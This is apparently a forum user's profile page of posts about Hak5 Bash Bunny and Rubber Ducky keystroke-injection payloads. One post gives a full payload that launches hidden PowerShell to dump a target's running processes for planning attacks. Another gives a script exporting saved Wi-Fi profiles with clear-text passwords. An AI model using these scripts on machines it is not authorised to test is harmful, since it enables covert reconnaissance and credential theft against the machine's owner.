Decoy
-
Posts
248 -
Joined
-
Last visited
-
Days Won
2
Posts posted by Decoy
-
-
1 hour ago, Malachai said:
Well share the wealth.... lol
Indeed, share! I just picked up one of these bad boys too:
https://hakshop.com/collections/wireless-gear/products/long-range-wifi-kit
-
4 minutes ago, qdba said:
Thanks..... Done.....
No worries. I wanted to make sure people could find it. That is an excellent payload.
-
I forgot about that. I just installed all the tools and everything when I first got the BB and never gave it much thought after that.
-
I'm pretty sure all of those keyboards are already available for the bash bunny, and I linked it as a reference only. So you can set to any of those languages as I've shown above, using the first 2 letters from each resource.
-
1 hour ago, blotter420 said:
i was wondering if there is any way to reassemble/customize them?
Like the hardware or the software? If they are Android phones, you can most likely root the devices, and play with some custom roms.
-
This is a link to the Rubber Ducky resources folder:
https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Encoder/resources
This will show you the available keyboard layouts.
-
1
-
-
If you're in the HID attack mode, you can set your keyboard like so:
Q SET_LANGUAGE DEOr US, and so on, and so forth.
-
1
-
-
6 hours ago, qdba said:
New Version 2.0.1
Added:
Gather Computerinformation (Hardware, Software, Hotfixes, OS Informatio, OS ProductKey, Userlist...)
https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0
I think you might need to update the main GitHub link on your original post.
-
6 hours ago, Dave-ee Jones said:
Simple but effective.
Utilising simple powershell commands and functions is definitely one of the best things about Ducky script...
Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn, and extremely effective.
-
This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system. An example of useful process info:
Name : avpui
Id : 724
PriorityClass : Normal
FileVersion : 17.0.0.643
Path : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe
Company : AO Kaspersky Lab
CPU : 85.875
ProductVersion : 17.0.0.643
Description : Kaspersky Anti-Virus
Product : Kaspersky Anti-Virushttps://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo
#!/bin/bash # # Title: Process Info # Author: Decoy # Version: 1.0 # Category: Recon # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, Storage # # # Amber Blink Fast.....Initialization # Amber................Begin # White Blinking... ...Moving loot to mass storage # Blue Blinking........Syncing File System # Green................Finished # Initialization LED R G 100 # Create loot directory mkdir -p /root/udisk/loot/ProcessInfo # Runs minimized powershell gathering process information for potential future attack vectors LED R G ATTACKMODE HID STORAGE QUACK DELAY 6000 QUACK GUI r QUACK STRING "powershell -NoP -NonI -W Hidden" QUACK ENTER QUCK DELAY 1000 QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit" QUACK ENTER LED R G B 100 sleep 1 # Sync File System LED B 100 sync; sleep 1; sync # Trap is clean LED G -
I'm pretty sure the payload already exists. Check this one out:
Search the forums, you'll find a lot of payloads not officially published on the Wiki. Look at some examples, try playing with it. Good luck!
-
Doubtful. I don't think something like this can be done with network attack vectors. But someone can correct me if I'm wrong.
-
1 hour ago, Scott2906 said:
i dont know if you know this but is it possible to flash the ducky with the firmware so its a twinduck and just to save the .xml file on the ducky ?
Yes you can. You might be better off using PowerShell for it, but you'd just navigate to the ducky directory prior to running netsh.
-
Awesome, it's definitely helpful. Thanks for creating this one for the Bunny!
-
This actually wouldn't be a bad idea for the Ducky, LAN Turtle, and Pineapples as well.
-
-
In what context?
-
Why not dump all the profiles? Try this instead:
DELAY 1000 GUI DELAY 200 ENTER STRING cmd ENTER DELAY 600 STRING netsh wlan export profile key=clear ENTERThis will dump all profiles and clear text wifi passwords into an xml file in whatever directory you're currently in.
-
8 hours ago, Draxiom said:
Thanks dad.
Is he really your Dad?
-
Did this resolve your issue?
-
Check out the recent Hashcat episode of Hak5, it just came out a few weeks ago. One of the Hashcat developers talked about which cards he prefers.
-
That being said, I feel like using TABs and ARROWs can be hit or miss. It's too easy to have another process change focus, etc. I think the PowerShell line is the way to go. Another solution would be an ALT F4 combo. Good luck!
-
I think all you should have to do is define the keyboard resource from the command line like this:
java -jar duckencode.jar -i script.txt -o inject.bin -l resources/us.properties
If that doesn't work, you can get the updated resources from GitHub. Let me know how it works out. -
3 hours ago, chaz said:
Well done for working on this, I have made a native (C) version of PSExec (my project) but it's detected by 1 Anti-Virus.
Why did it get picked up by AV?
Violation of CoC
in Payloads
Posted
You are just cranking out payloads. I've tested this on a Windows 10 Machine and it works pretty well so far. Great payload, Sir.